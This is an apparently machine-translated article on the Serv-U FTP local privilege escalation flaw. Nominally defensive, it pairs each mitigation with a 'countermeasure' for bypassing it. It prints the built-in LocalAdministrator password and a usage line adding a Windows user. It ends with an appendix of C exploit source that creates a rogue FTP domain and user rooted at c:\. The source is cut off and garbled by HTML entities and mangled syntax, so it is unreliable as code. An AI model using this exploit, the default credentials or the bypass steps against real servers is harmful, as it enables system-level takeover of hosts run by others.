Serv-u local permission improvement ultimate defense against vulnerabilities

By xiaolu
Serv-u Ftp server (Serv-u) is a widely used Ftp Server with powerful functions and convenient use. Serv-u> 3. the local permission escalation vulnerability exists in Version x. Using the guest permission combined with Exp can run the program with the system permission, and using Webshell combined with Exp to enhance the permission has become a common method for elevation.

Vulnerability introduction:
The vulnerability is caused by the use of the Serv-u local default Management port. The default Administrator logs on to the new domain and the user to execute commands. Serv-u> 3. in Version x, the default Local Management port is 43958, and the default Administrator is LocalAdministrator. The default password is # l @ $ ak #. lk; 0 @ P, which is integrated in Serv-u. You can use the Guest permission to connect and manage Serv-u.

Prevention measures and countermeasures:
General prevention method: Set directory permissions to prevent the use of Webshell to run Exp programs by removing the execution permissions of iusr users in the Web directory.
Countermeasure: This method has some limitations. There are many directories to be set, so there is no omission. For example, I found that many virtual hosts are in C: users and SettingsAll Users and their subdirectories have no permissions. As a result, you can upload and run Exp in this directory, which includes x: php, x: perl, etc, this directory is fully controlled by everyone. Some hosts also support php, pl, and aspx, which is simply a server's Serv-U disaster, ^ _ ^, making it easier to run programs.
A more advanced prevention method: Replace the last B6AB with 3930 (12345) and start Serv-u. Now the Local Management port is 12345:

TCP 127.0.0.1: 12345 0.0.0.0: 0 LISTENING

Countermeasure: It's easy to deal with this problem. netstat -an, you can see the port, but it's easy to say that netstat.exe is running. In fact, you can upload netstat.exe to the executable directory to run it. Then modify Exp compilation and upload and run it. I modified an Exp that can be customized, running format:

USAGE: serv-u.exe port "command" Example: serv-u.exe 43958 "net user xl xiaoxue/add"

More advanced prevention measures: Modify the Administrator name and password, and use ultraeditto open servudaemon.exe to search for Ascii: localadministrator, and upgrade l@$ak#.lk1_0@p. Then, modify the parameter to an equal length.
Countermeasure: the default administrator cannot connect. Is there a solution? Hey hey, some administrators use the default directory C: Program to install Serv-u. Use Ultraedit to open the analysis, and the Serv-U account and password will be ready. Modify Exp compilation and upload and run the command, we won again.

Ultimate defense:
1. Set directory permissions without carelessness;
2. It is recommended that you do not use the default installation path of Serv-U and set the permissions for the Serv-U directory, which can only be accessed by administrators;
3. Modify the default Administrator name and password of Serv-U by using the method I introduced. If you like it, you can change the port.

Postscript:
Intrusion and defense are like Spears and yundun. There cannot be any weakness on yundun, or it will become ugly. The purpose of this article is to provide server administrators with a way to defend against this vulnerability. (The above tests passed on Serv-u 5.0, 5.1, 5.2)
Appendix: Exp source code

 

# Pragma comment (lib, "ws2_32.lib ")
# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
# Include <io. h>
# Include <process. h>

// Responses
# Define ban "220"
# Define USEROK "331 User name okay"
# Define PASSOK "230 User logged in, proceed ."
# Define ADMOK "230-Switching to system maintenance mode ."
# Define DOMAINID "200-DomainID ="
// Commands

# Define XPLUSER "USER xl"
# Define XPLPASSWORD "PASS 111111"
# Define USER "USER LocalAdministrator"
# Define PASSWORD "PASS # l @ $ ak #. lk; 0 @ P"

# Define MAINTENANCE "site maintenance"
# Define EXIT "QUIT"
Char newdomain [] = "-SETDOMAIN"
& Quot;-Domain = xl | 0.0.0.0 | 2121 |-1 | 1 | 0 & quot"
"-TZOEnable = 0"
"TZOKey = ";
/* "-DynDNSEnable = 0"
"DynIPName = ";
*/
Char deldomain [] = "-DELETEDOMAIN"
"-IP = 0.0.0.0"
& Quot; PortNo = 2121 & quot ";

Char newuser [] =
"-SETUSERSETUP"
"-IP = 0.0.0.0"
& Quot;-PortNo = 2121 & quot"
"-User = xl"
"-Password = 111111"
"-HomeDir = c :\"
"-LoginMesFile ="
"-Disable = 0"
"-RelPaths = 1"
"-NeedSecure = 0"
"-HideHidden = 0"
"-AlwaysAllowLogin = 0"
"-ChangePassword = 0"
"-QuotaEnable = 0"
"-MaxUsersLoginPerIP =-1"
"-SpeedLimitUp = 0"
"-SpeedLimitDown = 0"
&